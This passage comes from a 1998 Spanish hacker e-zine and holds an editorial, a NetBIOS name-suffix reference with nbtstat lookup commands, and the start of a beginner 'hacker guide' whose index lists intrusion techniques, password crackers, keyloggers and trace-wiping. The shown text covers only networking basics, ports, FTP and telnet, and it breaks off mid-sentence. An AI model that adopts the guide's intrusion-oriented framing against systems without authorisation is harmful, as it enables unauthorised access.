   .    .          .    .    .    .    .   .   .    .             .
              .       .   .     .    .             .    .     .         .
 .     .   .     .           .   .  .   .  .    .         .     .   .
  .                   .      .             .
      .      .     .                      Ŀ    .          .
    .   .    .        .                   ۳      .                 .
 .               .                 Ĵ           .         .
     .     .         .      Ĵ۳Ŀ      .          .   .
  .       .   .     .       ĿĴ۳          .   .
        .                   Ŀ۳J                     .   .
.   .       .   .  .      Ŀ۳۳J۳       .   .       .
          .          .    ۳۳F               .          .
   .           .                        .         .
  .  .    .  .                                 .           .      .
                 .  .      H A C K E R S  T E A M         .   .    .   .
     .        .                J O U R N A L          
  .    .   .      .     Ĺ  .         .        .
                 .۳     VOL. #2, N7, 1998.        .           .
ļ

           IS COMPUTERWORLD TURNING HONEST CITIZENS INTO CRIMINALS?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          

     Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
           de la informacion aqui expuesta y tampoco tiene que estar
           de acuerdo con lo que sus colaboradores opinen.
           Tampoco esperamos que la gente use la informacion aqui expuesta
           para hacer dao ya que tan solo es con fines didacticos.
 
     Recomendado el uso del editor del MS-DOS.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          

     #CURRENT MEMBERS :

     - CONDE VAMPIRO     - CODER  H/P/V    EDITOR
     - MAC CRACK         - CODER  C/P      WEBMASTER
     - Mr ELEKTRO        -        H/P      ADMIN
     - TASSLEHOFF        - CODER  H        CO-WEBMASTER
     - Dr BINIX          - CODER  H/P/V/C  ADMIN

     #WEB OFICIAL :

     - http://www.jjf.org

     #E-MAIL OFICIAL :

     - team@jjf.org    

     #LLAVE PGP OFICIAL :
     
   -----BEGIN PGP PUBLIC KEY BLOCK-----
    - J.J.F. / Hackers Team -
        http://www.jjf.org
   Version: PGPfreeware 5.5.3i

   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
   =HQVG
   -----END PGP PUBLIC KEY BLOCK-----

     
     #DISTRIBUIDORES OFICIALES DEL E-ZINE :

     - http://wakanda.islatortuga.com
     - http://underhack.islatortuga.com
     - http://personal.redestb.es/cheroky-1 
     - http://members.xoom.com/baron_rojo/
     - http://members.xoom.com/rifoxxx
     - http://www.bigfoot.com/~u_taker
     - http://phucksys.dyn.ml.org
     - http://www.bigfoot.com/~proyecto_r
     - http://members.xoom.com/zine_store/
     - http://visitweb.com/disciples 

     #MIEMBRO OFICIAL (web ring) DE :

     - Black Angels
     - Spanish Underground Web Ring

     #COLABORADORES CON ESTE NUMERO :

     - {CyBoRg} (SHG Security)
     - EiVoL (Hack Trax & HoLoCaUsTo)
     - Bisho
     - PoSiDoN
     - Nobody

     #SALUDOS :

     - Metalslug (Wakanda)           - NeonSurge (Rhino9)
     - Schoddy Guy (Underhack)       - L0pth
     - Cheroky                       - Ivan Arce (CORE SDI S.A.)
     - Silicon Dragon                - Proyecto R
     - Paseante (SET)                - SHG Security
     - Dr Slump (oioio)
 
<>
<>
<>

  - INDICE.                                  

    TITULO                                        AUTOR
  \_______________________________/

  * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  * SIGNIFICADO DE NETBIOS ................... {CYBORG}.
  * LA SUPER GUIA DEL HACKER
    VERSION DELUXE ........................... NOBODY.
  * CYBERANGEL: UN PROGRAMA, UN
    PASSWORD, UN MONTON DE SEGURIDAD ......... MAC CRACK & TASSLEHOFF.
  * CURSO DE HACK VII ........................ CONDE VAMPIRO.
  * TROYANOS EN LINUX ........................ POSIDON.
  * TODO (O CASI TODO) SOBRE
    El SMURFING V1.0 ......................... MAC CRACK.
  * UTILIDADES DCL PARA EL HACKER DE VMS ..... EIVOL.
  * QUE ES UN HACKER ......................... TASSLEHOFF.
  * CONSEAL PC FIREWALL BUG .................. BISHO.
  * EL LECTOR OPINA .......................... VARIOS.
  * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

<>

<>

  -------------
   EDITORIAL 
  -------------

        Bueno chicos, tras un largo periodo hemos vuelto como siempre, pero
  esta vez tenemos buenos motivos para a ver sacado este numero en esta fecha
  concreta, pues resulta que cumplimos 1 AO de revista :)))) Quien lo diria,
  cuando empezamos esta loca odisea, algunos nos criticaron pero poco a
  poco hemos demostrado que estamos a la altura de cualquier ezine. Decir
  que este esfuerzo a sido gracias a muy pocos, ya que todavia necesitamos
  que la gente escriba articulos, ya que si no no haremos gran cosa, pero en
  fin seguiremos como siempre.
  
        Como haveis podido comprobar, estamos muy activos ya que ahora tenemos
  domimo propio :) hemos comenzado la distribucion de nuestros "white papers"
  conocidos como - J.J.F. / Hackers Team - Security Documentation, tambien
  estamos distribuyendo nuestro software de seguridad y llevando un equipo
  de voluntarios para participar en el concurso internacional de RC5,
  conocido como JJF RC5 Crack Team, en el cual esperamos que todos vosotros
  que nos leeis, os apunteis :))

        Estad atentos a todos los cambios que se han producido en
  - J.J.F. / Hackers Team -, los cuales han sido muchos, como TODAS NUESTRAS
  DIRECCIONES DE CORREO ademas de NUESTRA NUEVA LLAVE PGP. Por lo que para
  poneros en contacto con nosotros debeis usar las nuevas direcciones.

        Por otro lado, tenemos un nuevo miembro en nuestras filas, Dr Binix al
  cual le damos la bienvenida en - J.J.F. / Hackers Team -. Tambien tenemos 3
  distribuidores mas que son los siguientes http://www.bigfoot.com/~u_taker
  llevado por TAkER y el otro es http://phucksys.dyn.ml.org llevado por
  GabberMan, y por ultimo el website http://members.xoom.com/zine_store/
  llevado por MAU, el siguiente es http://visitweb.com/disciples llevado por
  Avathar.

        Como vereis muchas cosas han cambiado, nos hemos vuelto mas abiertos,
  en el sentido del website, ya que nuestra intencion no es inducir a la
  delincuenia sino todo lo contrario, ayudar a mejorar la seguridad y ayudar
  a los admin's a que conozcan los peligros pero tambien sin olvidarnos
  todas esas personas que quieren ser hackers, o sea nuestros fieles lectores.
  En nuestro nuevo domino notareis muchos cambios que seguro que os seran
  muy gratos y recomendamos leer nuestro FAQ, el cual os resolvera todas
  las dudas que tengais.

        Para cualquier articulo, duda, consulta sobre el ezine, simplemente
  debeis escribir a nuestro buzon de mail:

  editor@jjf.org
                                                   - J.J.F. / HACKERS TEAM -

<>

<>

                         /----------------------\
                        - SIGNIFICADO DE NETBIOS -
                         \----------------------/

        Bueno os mando algo sobre netbios, espero que os guste.

        Vamos a ver por donde empezamos, cuantas veces habeis echo un nbtstat
  y os han salido un monton de cosas y no sabeis el significado de ellas,
  solo con saber si hay un <20> os basta, pero esto no es asi, hay que saber
  el porque de cada cosa. Asi que en este texto os explicare que significa 
  cada cosa rara que sale. 

        Los nombres de NETBIOS pueden tener una loguitud de 16 caracteres y
  el caracter 16th es especial que es usado por los servicios de red de
  microsoft.

        Hay dos tipos en un entorno NetBIOS, Unique (unico) y Group (Grupo).
  Un nombre unique deber ser unico en la red, mientras que un nombre Group no
  tiene porque ser unico y todos los procesos que tiene un determinado grupo,
  pertenecen al grupo. Cada nodo NetBIOS mantiene una tabla de todos los
  nombres actuales en el nodo. La siguiente tabla de NetBIOS, muestra los
  poxibles subfijos en hexadecimal.

  Name Number Type Usage 

  <computername> 00 U Workstation Service 
  <computername> 01 U Messenger Service 
  <\\_MSBROWSE_> 01 G Master Browser 
  <computername> 03 U Messenger Service 
  <computername> 06 U RAS Server Service 
  <computername> 1F U NetDDE Service 
  <computername> 20 U File Server Service 
  <computername> 21 U RAS Client Service 
  <computername> 22 U Exchange Interchange 
  <computername> 23 U Exchange Store 
  <computername> 24 U Exchange Directory 
  <computername> 30 U Modem Sharing Server Service 
  <computername> 31 U Modem Sharing Client Service 
  <computername> 43 U SMS Client Remote Control 
  <computername> 44 U SMS Admin Remote Control Tool 
  <computername> 45 U SMS Client Remote Chat 
  <computername> 46 U SMS Client Remote Transfer 
  <computername> 4C U DEC Pathworks TCPIP Service 
  <computername> 52 U DEC Pathworks TCPIP Service 
  <computername> 87 U Exchange MTA 
  <computername> 6A U Exchange IMC 
  <computername> BE U Network Monitor Agent 
  <computername> BF U Network Monitor Apps 
  <username> 03 U Messenger Service 
  <domain> 00 G Domain Name 
  <domain> 1B U Domain Master Browser 
  <domain> 1C G Domain Controllers 
  <domain> 1D U Master Browser 
  <domain> 1E G Browser Service Elections 
  <INet~Services> 1C G Internet Information Server 
  <IS~Computer_name> 00 U Internet Information Server 
  <computername> [2B] U Lotus Notes Server 
  IRISMULTICAST [2F] G Lotus Notes 
  IRISNAMESERVER [33] G Lotus Notes 
  Forte_$ND800ZA [20] U DCA Irmalan Gateway Service 

  Unique (U) .- Debe tener solamente una IP asignada. 
  Group (G) .- El nombre unico debe existir con varias direcciones IP. 
  Multihomed (M) .- El nombre es unico, pero debido a varias tarjetas de red
                    en el mismo ordenador, se le permite en la registracion.
                    Numero maximo de direcciones es 25. 
  Internet Group (I) .- Configuracion especial del grupo, nombre usado por el 
                        nombre de dominios de WINNT. 
  Domain Name (D) .- Esto es nuevo en NT 4.0. Nombre del dominio. 

  1.- TIPO UNIQUE significado del 16th: 

        <00> Nombre del servicio de la estacion de trabajo, este es el nombre
  al que se refiere el nombre del NETBIOS. 

        <03> Nombre del servico de mensajeria, es usado cuando recibimos o
  emviamos mensajes. Este nombre esta registrado con el servidor WINS. 

        <1B> Nombre del Dominio Principal. Identifica al primer contralador de 
  Dominio. 

        <06> Servicio de servidor RAS. 

        <1F> Servicio NetDDE. 

        <20> Nombre del servicio servidor, nos indica que hay algo compartido. 

        <21> Cliente RAS. 

        <BE> Monitor de agente de red. 

        <BF> Utilidad de monitor de red. 

  2.- TIPO GROUP significado del 16th: 

        <1C> Nombre del grupo de dominio. Contiene la lista de dirreciones los 
  equipos que estan registrados en el dominio. 

        <1D> Nombre del master Browser, es usado por los equipos clientes para 
  acceder a =e9l. 

        <1E> Nombre de un grupo normal. 

        <20> Nombre de un grupo especial, llamado grupo de internet que es 
  registrado con un servidor de WINS que identifica grupos de equipos con
  fines administrativos.

        _MSBROWSE_ Va en relacion con el nombre del Dominio. 

        Para un rapido testeo de todo esto, se pueden utilizar los siguientes
  comandos desde una ventana de MS-DOS: 

  nbtstat -A direccion IP 
  nbtstat -a Host 

        Las sesiones NetBIOS son bidireccionales, requiere un proceso de
  cliente y otro de servidor, es decir, requiere la cooperacion de 2
  ordenadores. La mayoria de NetBIOS implementada para TCP/IP lleva a cabo
  una resolucion de nombres pero usando cualquier broadcast o fichero LMHOSTS.
  Cuando NetBIOS esta sobre TCP/IP se le conoce como modulo NBT.

        Tambien tenemos el SMB (Servidor Mensajes Bloque), es un tipo de
  protocolo de mensajeria en una LAN entre clientes y servidores, que se usa
  para comunicarse entre ellos. El SMB es un protocolo de nivel superior que
  puede ser transportado sobre NetBEUI, NetBIOS sobre IPX y NBT. SMB es usado
  por Windows 3.x, Win95, WinNT y OS/2. Permite acceder a directorios 
  remotamente. 

  Texto escrito por: {CyBoRg} 
  SHG Security 

<>

<>
                                                                   02-11-1998.
                                                                     ??????                                                                     
                      
                      ͻ
                        LA SUPER GUIA DEL HACKER 
                      ͻ
                      ͼ
                              by Nobody          ٺ 
                      ͼ
                      

                      <<<<<<<<<<VERSION DELUXE>>>>>>>>>>>

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

  Nota Del Autor: No me hago responsable de la mala utilizacion de la
                  informacion aqui expuesta ya que tan solo es para fines
                  didacticos.
                  Esta guia es de distribucion libre excepto para las
                  instituciones gubernamentales que deberan abonar 2000 pts
                  a alguna fundacion para apadrinar nios.

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

  - INDICE:

  1 ......................... Que Es Esta Guia Exactamente ?
  2 ......................... Descripcion General De Windows.
   2-1 ...................... Seguridad En Windows.
  3 ......................... Protocolo TCP/IP y Demas Historias.
   3-1....................... Puertos.
   3-2....................... Ftp.
   3-3....................... Telnet.
  4 ......................... Hacking Basico En Windows. 
   4-1 ...................... Phf.
   4-2 ...................... Ftp.
   4-3 ...................... Ping De La Muerte.
   4-4 ...................... Recursos Compartidos.
   4-5 ...................... Fake Mail Con El Telnet.
   4-6 ...................... Cambiando El Entorno.
   4-7 ...................... Finger.
   4-8 ...................... Whois.
   4-9 ...................... Tracert.
   4-10 ..................... Winipcfg.
   4-11 ..................... Ipconfig.
   4-12 ..................... Arp.
   4-13 ..................... Route.
   4-14 ..................... Netstat.
  5 ......................... Utilizacion De Tools.
   5-1 ...................... SkamWerks Lab version 1.1b.
   5-2 ...................... WaReZ! Version 95.12.31.
   5-3 ...................... John the Ripper v1.4.
   5-4 ...................... Gobbler v 2.1.
   5-5 ...................... Sharepasswd.
   5-6 ...................... Snadboy's Revelation v1.1.
   5-7 ...................... Keylog95.
   5-8 ...................... Glide.
   5-9 ...................... Win95 AnonyMail v 1.0.
   5-10 ..................... Hacker's Utility, V 1.02.
   5-11 ..................... Haktek v1.1.
   5-12 ..................... Claymore Brute Force.
   5-13 ..................... Skream's Port Listener V 2.3.
   5-14 ..................... WSOCK32 Winsock Spy Facility Version .91
   5-15 ..................... PWlTool V 4.0.
   5-16 ..................... PwlView V 1.01.
  6 ......................... Medidas De Seguridad.
   6-1 ...................... Protegiendo Nuestro Ordenador.
    6-1 ..................... Ataques Tipicos a Nuestro Windows.
    6-2 ..................... Encriptacion De Nuestra Informacion.
    6-3 ..................... Eliminar Informacion De Forma Segura.
    6-4 ..................... Eliminacion De Virus.
   6-1-1 .................... Protegiendo Nuestras Acciones.
    6-1-1-1 ................. Borrando Nuestras Huellas.
    6-1-1-2 ................. Encriptando Nuestro Correo.
  7 ......................... Sugerencias Para Un Mejor Hacking.
  8 ......................... Obtener Informacion.
  9 ......................... Despedida.
   9-1 ...................... Agradecimientos.

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

  1. Que Es Esta Guia Exactamente ?

  Esta guia esta enfocado hacia todo aquel que quiere ser hacker pero no
  quiere aprender unix o no lo sabe manejar (grave error). Pues por esta
  razon esta guia esta enfocada a los usuarios de windows, principalmente
  los de win95/98. Por el contrario esta guia no se dedicara al NT o Unix,
  aunque por supuesto se hara referencia a estos sistemas sobre todo cuando
  son estos mismos Sistemas Operativos en los cuales se centraran nuestros
  actos, supuestamente legales :)

  Todo esto que digo puede sonar tonterias y puedes pensar que en win95/98 no
  podras llegar a ser un gran hacker porque es necesario conocer unix, y
  estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para
  hacer sus pinitos a aquellos que solo saber usar win95/98, yo por mi parte
  aconsejo aprender unix por varias razones que no viene a cuento en esta
  guia.

  Con esta guia te convertiras en un magnifico Hacker usando un sistema que
  no es propenso al hacking. Como es normal al usar win95/98 estaremos muy
  limitados en muchos aspectos pero podras aprender por ejemplo, algunos
  bug que podras usar en tu favor, la utilizacion de diversas herramientas
  hacker que no estan disponibles generalemente en win95/98 y ademas a usar
  los recursos que te ofrece Internet en tu favor, abreviando un poco tanta
  charla, llegaras a conocer la red de una forma diferente y a manejar
  win95/98 de forma distinta a lo conocido hasta ahora.

  Esta es la version Deluxe, de mi conocida guia LA SUPER GUIA DEL HACKER, la
  cual a sido revisada y actualizada, algunas herramientas como el Bo o Netbus
  no seran explicadas debido a que son realmente faciles de usar y ademas
  disponen de gran variedad de opciones y me saldria un documento monstruoso.
  Al igual que me he dejado muchas cosas, que a lo mejor gustaria que
  explicara pero realmente es imposible explicarlo todo, ademas el espiritu
  hacker es aquella persona que simplemente quiere conocer pero debe
  investigar por si misma, de nada sirve que este todo hecho. Por eso os digo:

                 "Si juegas a Hacker, piensa como un Hacker."

        Surfeando por Internet, he encontrado esta guia pasada a HTML y lo
  mas curioso es que han quitado mi nick del documento (que raro };-), pues
  para estos plagiadores, aqui teneis la version Deluxe para que la volvais
  a copiar!!!!!

  2. Descripcion General De Windows.

  Como todos sabemos el windows95/98 es un popular sistema operativo de la
  casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy
  sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad
  en casi todos sus aspectos, ademas no ofrece tanta versativilidad como otros
  sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual
  es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y
  ejecuta otro programa :) y veras esa famosa Multitarea.

  El win95/98 es un sistema operativo de 32 bits multitarea, que es muy comodo
  para la gente que busca facilidad, pero no te engaes pensando que es un
  sistema ideal para Internet, puede que para un usuario convencional le sea
  estupendo pero para un Hacker se queda muy corto de calle, ya que le falta
  muchos servicios que otros sistemas operativos si traen como el que ya
  tantas veces he repetido, el Unix (se nota que me encanta??:).

  Aqui os dejo de dar la murga sobre win95/98 ya que este texto no esta
  destinado a hablar sobre este sistema sino a usarlo para hackear. Ademas no
  creo que este contando nada nuevo sobre windows o sea que mejor me callo y
  si no sabes mucho sobre win95/98, pues ya sabes comprate un libro.

   2-1. Seguridad En Windows.

  Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no
  tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas
  que nos piden un password las podemos cerrar pulsando sobre la X o tambien
  nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana
  sin meter ningun password. 

  Por eso para que nuestro ventanas (nombre que se le da a win95/98 :)
  tendremos que instalarle algun paquete de seguridad disponible por la red,
  que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque
  siempre puedes comprar algun paquete comercial de seguridad, en mi opinion
  alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y
  cuando llega la oportunidad de demostrar su calidad nos falla, ya que no
  hay nada seguro 100%.

  Proteger nuestro win95/98 es cosa de cada uno pero tranquilidad, que la cosa
  no es muy dificil, es cuestion de estar atento a las novedades, en otras
  palabras estar informado. Mas abajo ya te entereras de estas cosas.

  3. Protocolo TCP/IP y Demas Historias.

  El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que
  engloba casi todos los servicios que solemos usar como por ejemplo cuando
  hacemos telnet, mail, ftp o cualquier cosa.

  TCP/IP proviene de Transmission Control Protocol y Internet Protocol
  respectivamente. Por fortuna para los usuarios de win95/98, este protocolo
  ya viene incorporado nativamente en el sistema, al contrario que ocurria
  con el windows 3.x, el cual lo teniamos que instalar para poder conectar
  a Internet.

  Como has podido comprobar en realidad son 2 protocolos pero que estan
  unidos, el primero o sea el TCP es el encargado de las comunicaciones y de
  la transmision de los paquetes cuando estamos conectados a un servidor. El
  IP es el encargado de que los paquetes llegen a destino por orden aunque
  tomen caminos diferentes.

                     * Diagrama del TCP *   

        cliente ->  El cliente le envia una  -> servidor
                    solicitud de conexion
                    espeficicando el puerto
                    de conexion al servidor.

        cliente <-  El servidor le responde  <- servidor
                    que conoce su peticion
                    de conexion.

        cliente ->  El cliente le devuelve   <- servidor
                    otra vez la peticion y
                    el circuito ya esta
                    abierto.

                     * Diagrama del IP *

       Informacion generalDireccion IPDireccion IPDatos 
       de cabezera.       de origen   de destino.      

  Pues aqui se acaba la explicacion basica de este protocolo, para el que
  este interesado en profundizar le remito a que se pille el RFC 1180 o un
  fichero disponible en multitud de servidores, desgraciadamente no te puede
  asegurar el nombre del fichero ya que lo he encontrado de varias formas
  pero te dare el nombre que aparece al editarlo, ya que en todos es igual:
  
                             Introduction
                                  to
                        the Internet Protocols

                      C                       R

                              C       S
                  Computer Science Facilities Group
                              C       I

                      L                       S

                               RUTGERS
                  The State University of New Jersey

                             3 July 1987
  
   3-1. Puertos

  Antes ya os he explicado muy brevemente la comunicacion del protocolo en
  cuestion. Pues ahora os pongo una extensa lista sobre los distintos
  puertos y sus servicios correspondientes. 

    echo                7/tcp
    echo                7/udp
    discard             9/tcp    sink null
    discard             9/udp    sink null
    systat             11/tcp
    systat             11/tcp    users
    daytime            13/tcp
    daytime            13/udp
    netstat            15/tcp
    qotd               17/tcp    quote
    qotd               17/udp    quote
    chargen            19/tcp    ttytst source
    chargen            19/udp    ttytst source
    ftp-data           20/tcp
    ftp                21/tcp
    telnet             23/tcp
    smtp               25/tcp    mail
    time               37/tcp    timserver
    time               37/udp    timserver
    rlp                39/udp    resource      # resource location
    name               42/tcp    nameserver
    name               42/udp    nameserver
    whois              43/tcp    nicname       # usually to sri-nic
    domain             53/tcp    nameserver    # name-domain server
    domain             53/udp    nameserver
    nameserver         53/tcp    domain        # name-domain server
    nameserver         53/udp    domain
    mtp                57/tcp                  # deprecated
    bootp              67/udp                  # boot program server
    tftp               69/udp
    rje                77/tcp    netrjs
    finger             79/tcp
    link               87/tcp    ttylink
    supdup             95/tcp
    hostnames         101/tcp    hostname      # usually from sri-nic
    iso-tsap          102/tcp
    dictionary        103/tcp    webster
    x400              103/tcp                  # ISO Mail
    x400-snd          104/tcp
    csnet-ns          105/tcp
    pop               109/tcp    postoffice
    pop2              109/tcp                  # Post Office
    pop3              110/tcp    postoffice
    portmap           111/tcp
    portmap           111/udp
    sunrpc            111/tcp
    sunrpc            111/udp
    auth              113/tcp    authentication
    sftp              115/tcp
    path              117/tcp
    uucp-path         117/tcp
    nntp              119/tcp    usenet        # Network News Transfer
    ntp               123/udp    ntpd ntp      # network time protocol (exp)
    nbname            137/udp
    nbdatagram        138/udp
    nbsession         139/tcp
    NeWS              144/tcp    news
    sgmp              153/udp    sgmp
    tcprepo           158/tcp    repository    # PCMAIL
    snmp              161/udp    snmp
    snmp-trap         162/udp    snmp
    print-srv         170/tcp                  # network PostScript
    vmnet             175/tcp
    load              315/udp
    vmnet0            400/tcp
    sytek             500/udp
    biff              512/udp    comsat
    exec              512/tcp
    login             513/tcp
    who               513/udp    whod
    shell             514/tcp    cmd           # no passwords used
    syslog            514/udp
    printer           515/tcp    spooler       # line printer spooler
    talk              517/udp
    ntalk             518/udp
    efs               520/tcp                  # for LucasFilm
    route             520/udp    router routed
    timed             525/udp    timeserver
    tempo             526/tcp    newdate
    courier           530/tcp    rpc
    conference        531/tcp    chat
    rvd-control       531/udp    MIT disk
    netnews           532/tcp    readnews
    netwall           533/udp                 # -for emergency broadcasts
    uucp              540/tcp    uucpd        # uucp daemon
    klogin            543/tcp                 # Kerberos authenticated rlogin
    kshell            544/tcp    cmd          # and remote shell
    new-rwho          550/udp    new-who      # experimental
    remotefs          556/tcp    rfs_server rfs# Brunhoff remote filesystem
    rmonitor          560/udp    rmonitord     # experimental
    monitor           561/udp                  # experimental
    garcon            600/tcp
    maitrd            601/tcp
    busboy            602/tcp
    acctmaster        700/udp
    acctslave         701/udp
    acct              702/udp
    acctlogin         703/udp
    acctprinter       704/udp
    elcsd             704/udp                  # errlog
    acctinfo          705/udp
    acctslave2        706/udp
    acctdisk          707/udp
    kerberos          750/tcp    kdc          # Kerberos authentication--tcp
    kerberos          750/udp    kdc          # Kerberos authentication--udp
    kerberos_master   751/tcp                 # Kerberos authentication
    kerberos_master   751/udp                 # Kerberos authentication
    passwd_server     752/udp                 # Kerberos passwd server
    userreg_server    753/udp                 # Kerberos userreg server
    krb_prop          754/tcp                 # Kerberos slave propagation
    erlogin           888/tcp                 # Login and environment passing
    kpop             1109/tcp                 # Pop with Kerberos
    phone            1167/udp
    ingreslock       1524/tcp
    maze             1666/udp
    nfs              2049/udp                  # sun nfs
    knetd            2053/tcp                  # Kerberos de-multiplexor
    eklogin          2105/tcp                  # Kerberos encrypted rlogin
    rmt              5555/tcp    rmtd
    mtb              5556/tcp    mtbd          # mtb backup
    man              9535/tcp                  # remote man server
    w                9536/tcp
    mantst           9537/tcp                  # remote man server, testing
    bnews           10000/tcp
    rscs0           10000/udp
    queue           10001/tcp
    rscs1           10001/udp
    poker           10002/tcp
    rscs2           10002/udp
    gateway         10003/tcp
    rscs3           10003/udp
    remp            10004/tcp
    rscs4           10004/udp
    rscs5           10005/udp
    rscs6           10006/udp
    rscs7           10007/udp
    rscs8           10008/udp
    rscs9           10009/udp
    rscsa           10010/udp
    rscsb           10011/udp
    qmaster         10012/tcp
    qmaster         10012/udp
   
  La verdad es que no te quejaras :) de esta lista. Si quieres mas
  informacion sobre los puertos con su debida explicacion mirate el RFC 1060.

   3-2. Ftp.

  Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol
  o sea Protocolo de Transferencia de Ficheros y como podras observar en el
  listado de los puertos al FTP le corresponde el 21. Este servicio hay que
  conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros
  tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking.

  Sino dispones de ningun cliente FTP, el propio win95/98 lleva incorporado
  uno, el unico problema es que no es muy vistoso ya que funciona en modo
  MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta
  que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y
  se pondra en modo FTP. Un ejemplo seria esto:

  c:\>ftp   <- Escribimos FTP.

  ftp>      <- activado el modo FTP.

  Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los
  comandos disponibles del FTP, como no viene a cuento no los explicare pero
  buscando por hay podras hallar informacion de lo que hace cada cosa pero
  lo mejor es que lo averigues tu solito.

   3-3. Telnet.

  Por suerte los usuarios de win95/98 con el telnet tienen mas suerte o menos
  segun se mire, ya que el servico de Telnet de win95/98 que tambien esta
  incorporado en el sistema, es muy facil de manejar y ademas tiene ventana
  propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que
  tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui
  la de "sistema remoto", entonces se activara otra ventana en la que
